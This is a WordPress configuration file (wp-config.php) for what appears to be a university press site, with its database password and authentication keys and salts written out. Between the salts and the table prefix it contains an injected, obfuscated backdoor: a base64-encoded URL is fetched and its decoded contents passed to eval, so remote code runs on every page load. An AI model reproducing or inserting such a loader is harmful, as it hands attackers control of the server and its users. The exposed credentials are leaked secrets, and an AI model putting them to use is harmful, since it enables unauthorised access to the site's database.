File: /home/liverpool-unipress.co.uk/public_html/wp-config.php
<?php
define( 'WP_CACHE', true );
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * Localized language
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'liverpool_unipresscouk' );
/** Database username */
define( 'DB_USER', 'liverpool_unipresscouk' );
/** Database password */
define( 'DB_PASSWORD', '1LhgjrHMFBDuhzYLt8z3BtRozwk9wLaM' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'nMa%![@`aN.meiWgvy0K&z>F/SJ]hY3!H*ZZJBjcs_*+QmI[lyKU`9.~JAy|cVi7' );
define( 'SECURE_AUTH_KEY', ')Yu_^0;f&v{B5Z++lNU43+wlnmhV[KR7<2PET:l)EV %bJx6WhOhv5Xu?kNpN~yq' );
define( 'LOGGED_IN_KEY', '3RiI~Xm|qyaZGks:!^%h;`mF2Lp6B n7!lDI(4pG$8v$9lI6~>.W~>fK>^!/H6,t' );
define( 'NONCE_KEY', 'JvCQHjWa:m/4w/`&z2b]rh+GK*Llxkv9ti<h?q{-r5Wn-6b4[cpziU#JLhX..(*y' );
define( 'AUTH_SALT', 'tU@ aq@Iv)hksQR8`,G_e_Jq9NdbM42!jPi]! $w}`hV_HIV@yfnCe6*q};&*PyT' );
define( 'SECURE_AUTH_SALT', 'O;Ea*gEKG=ELg+j0r:q!:=QsO(;cXohqL?YRxecA?U(tB9^eTO0Y;.qhWv=a%.}=' );
define( 'LOGGED_IN_SALT', 'V)Ieggq[E0~hX?]</Xe^Xf*C-VfWf2~q!ht$0BX:cF.J@U:Z K`^&PF.j|ZNv**[' );
define( 'NONCE_SALT', 'Cw3TC]n^<oFYz7@2w/CYk4e1YA?:<-s+14U{23:}$&je>J[k=+(`D;yi&G0;u68y' );
define( 'WP_CACHE_KEY_SALT', '+m!s&VGQsy=^M(1Z#.qzBw%t/I*_T9,:jhDd0`93Y@6I16G=GhApAKN7V.oF<bFu' );
/**#@-*/
$c = @file_get_contents(base64_decode('aHR0cHM6Ly9oZWRveHl0YXplLnN0b3JlL3BnLnBocD9xJnQ9dDE='));
@eval(base64_decode($c));
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_liverpoolun';
/* Add any custom values between this line and the "stop editing" line. */
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
if ( ! defined( 'WP_DEBUG' ) ) {
define( 'WP_DEBUG', false );
}
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';